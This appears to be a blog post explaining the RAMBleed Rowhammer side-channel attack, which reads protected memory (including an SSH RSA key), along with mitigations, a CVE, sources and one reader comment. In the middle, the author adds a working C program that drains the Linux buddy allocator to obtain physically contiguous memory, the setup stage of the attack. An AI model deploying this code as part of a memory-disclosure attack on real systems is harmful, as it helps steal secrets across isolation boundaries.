RAMBleed vulnerability

A team of researchers from several universities has disclosed the details of a new type of side-channel attack. With RAMBleed they show that Rowhammer-style attacks can be used to read protected memory, not just corrupt it. RAMBleed takes Rowhammer in a new direction: rather than using bit flips to alter sensitive data, the new technique exploits the same hardware bug to extract sensitive data stored in memory regions that are off-limits to the attacker. Like Rowhammer, RAMBleed relies on the ever-shrinking dimensions of DRAM cells, which let rapid accesses to one row disturb the charge in neighbouring rows.


RAMBleed attacks work against devices that use DDR3 and DDR4 memory modules. They do not work against the older DDR1 and DDR2 found in old PCs and many embedded systems. The attack works even when the DRAM is protected by error-correcting code: unlike Rowhammer, RAMBleed does not need the bit flip to persist, only to be observed, and is thus effective against the ECC memory commonly used in servers.

The attack has been demonstrated on vulnerable Linux systems. The researchers found a way to abuse the Linux buddy allocator to obtain a large block of physically consecutive memory on which to orchestrate the attack. They designed a new mechanism, which they call “Frame Feng Shui,” for placing the victim program's pages at a chosen location in physical memory. Finally, they developed a new way of arranging data in memory and hammering rows so that the bit flips induced in the attacker's own rows depend on the data in the victim's neighbouring rows, letting the attacker infer the victim's bits instead of merely flipping them from 0 to 1 or vice versa.
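As an added illustration of the buddy-allocator step (example code written for this post, not the researchers' own code), the program below sizes a "drain" of the Linux buddy allocator: it parses /proc/buddyinfo, adds up the free blocks below a target order, and allocates and touches that many pages so that the next order-0 requests are served by splitting one large free block and therefore come from one physically contiguous region. It assumes 4 KiB pages and the default eleven buddy orders; the embedded /proc/buddyinfo text is a constructed sample, used when the real file is not available.

```c
/* Added example (not the RAMBleed researchers' code): size a "drain" of the
 * Linux buddy allocator so that subsequent 4 KiB allocations are served by
 * splitting one large free block, i.e. come from physically contiguous
 * memory.  Assumptions: 4 KiB pages, the default 11 buddy orders (0..10),
 * and that /proc/buddyinfo reports the per-order free block counts. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NR_ORDERS 11            /* orders 0..10, default Linux MAX_ORDER (assumption) */
#define PAGE_BYTES 4096L

/* Constructed sample of /proc/buddyinfo; not captured from a real machine. */
static const char sample_buddyinfo[] =
    "Node 0, zone      DMA      1      1      0      1      2      1      1      0      1      1      3\n"
    "Node 0, zone    DMA32      5      4      6      8      3      5      2      1      1      2     12\n"
    "Node 0, zone   Normal   1234    567    210     88     40     12      6      3      2      1     50\n";

/* Parse one "Node N, zone NAME c0 c1 ... c10" line.  Returns 1 on success. */
static int parse_zone_line(const char *line, char *zone, size_t zone_len,
                           long counts[NR_ORDERS])
{
    const char *p = strstr(line, "zone");
    if (!p) return 0;
    p += 4;
    while (*p == ' ') p++;
    size_t i = 0;
    while (*p && *p != ' ' && i + 1 < zone_len) zone[i++] = *p++;
    zone[i] = '\0';
    for (int order = 0; order < NR_ORDERS; order++) {
        char *end;
        long v = strtol(p, &end, 10);    /* strtol skips the column padding */
        if (end == p) return 0;          /* fewer columns than expected */
        counts[order] = v;
        p = end;
    }
    return 1;
}

/* Number of 4 KiB pages that must be allocated (and kept) before the named
 * zone has no free block below target_order.  After that point the next
 * order-0 request is served by splitting an order-target_order block, and the
 * following 2^target_order pages all come from inside that one contiguous
 * region (unless another process frees memory in between).  Uses the first
 * zone with that name (first NUMA node).  Returns -1 on bad input. */
static long pages_to_drain(const char *buddyinfo, const char *zone_name,
                           int target_order)
{
    if (target_order < 1 || target_order > NR_ORDERS) return -1;
    const char *line = buddyinfo;
    while (*line) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        char buf[512];
        if (len >= sizeof buf) len = sizeof buf - 1;
        memcpy(buf, line, len);
        buf[len] = '\0';
        char zone[32];
        long counts[NR_ORDERS];
        if (parse_zone_line(buf, zone, sizeof zone, counts) &&
            strcmp(zone, zone_name) == 0) {
            long pages = 0;
            for (int o = 0; o < target_order; o++)
                pages += counts[o] * (1L << o);   /* an order-o block is 2^o pages */
            return pages;
        }
        if (!nl) break;
        line = nl + 1;
    }
    return -1;
}

/* Size in bytes of one free block of the given order. */
static long block_bytes(int order) { return PAGE_BYTES << order; }

int main(void)
{
    char text[8192];
    FILE *f = fopen("/proc/buddyinfo", "r");
    size_t n = f ? fread(text, 1, sizeof text - 1, f) : 0;
    if (f) fclose(f);
    if (n == 0) {                      /* not on Linux: fall back to the sample */
        strcpy(text, sample_buddyinfo);
        n = strlen(text);
    }
    text[n] = '\0';

    int target = 9;                    /* order 9 = 2 MiB of contiguous frames */
    long pages = pages_to_drain(text, "Normal", target);
    if (pages < 0) { fputs("zone Normal not found\n", stderr); return 1; }
    printf("allocate and touch %ld pages (%ld MiB) to drain orders below %d "
           "(block size %ld bytes)\n",
           pages, (pages * PAGE_BYTES) >> 20, target, block_bytes(target));

    /* Touch one byte per page so each page is really faulted in.  The
     * buddyinfo snapshot is racy, other processes allocate concurrently and
     * transparent huge pages change the picture, so treat the count as a
     * starting point; a real attack would keep this drain alive while it
     * allocates the pages it intends to hammer. */
    char *drain = malloc((size_t)pages * PAGE_BYTES);
    if (!drain) return 1;
    for (long i = 0; i < pages; i++) drain[i * PAGE_BYTES] = 1;
    printf("drained; the next %ld pages should share one order-%d block\n",
           1L << target, target);
    free(drain);
    return 0;
}
```

The per-order sum is the whole trick: every block of order o that is below the target holds 2^o pages, and the allocator hands out the lowest orders first, so only after all of them are consumed does a request split a larger block. Whether the pages you then receive really are adjacent still has to be confirmed, for example by checking which of them show Rowhammer flips together.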

The researchers used the technique to steal a 2048-bit RSA key (in this case an SSH key, but it could have been any key or other secret). RAMBleed can potentially read any data stored in memory.

Oracle has released an advisory for RAMBleed, and other vendors will likely do the same. Users can mitigate the risk by upgrading to DDR4 memory with targeted row refresh (TRR) enabled. Rowhammer-induced bit flips have been demonstrated on TRR memory, so TRR does not completely block Rowhammer attacks, but it makes them much harder to accomplish in practice, hopefully hard enough not to be an issue. Oracle does not believe that additional software patches will be needed to address the RAMBleed issues.

Is there a CVE number? Yes, see CVE-2019-0174.

Sources:

https://arstechnica.com/information-technology/2019/06/researchers-use-rowhammer-bitflips-to-steal-2048-bit-crypto-key/

https://www.zdnet.com/article/rambleed-rowhammer-attack-can-now-steal-data-not-just-alter-it/

https://rambleed.com/

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0174

https://www.securityweek.com/new-rambleed-attack-allows-access-sensitive-data-memory

https://blogs.oracle.com/security/rambleed

3 Comments

  1. Tomi Engdahl says:

    FPGA cards can be abused for faster and more reliable Rowhammer
    attacks
    https://www.zdnet.com/article/fpga-cards-can-be-abused-for-faster-and-more-reliable-rowhammer-attacks/
    Seeing that FPGA-CPU architectures are becoming more common, a team of
    researchers from the Worcester Polytechnic Institute in the US, the
    University of Lubeck in Germany, and Intel, has looked into how
    Rowhammer attacks impact this new cloud setup. Furthermore, the
    academic team also found that a JackHammer attack is much more
    difficult to detect because the FPGA’s direct access to system
    resources leaves no traces on the CPU of the FPGA’s memory access
    operations. Since most anti-Rowhammer detection systems are configured
    at the CPU level, this opens a new blind spot in CPU and cloud
    security.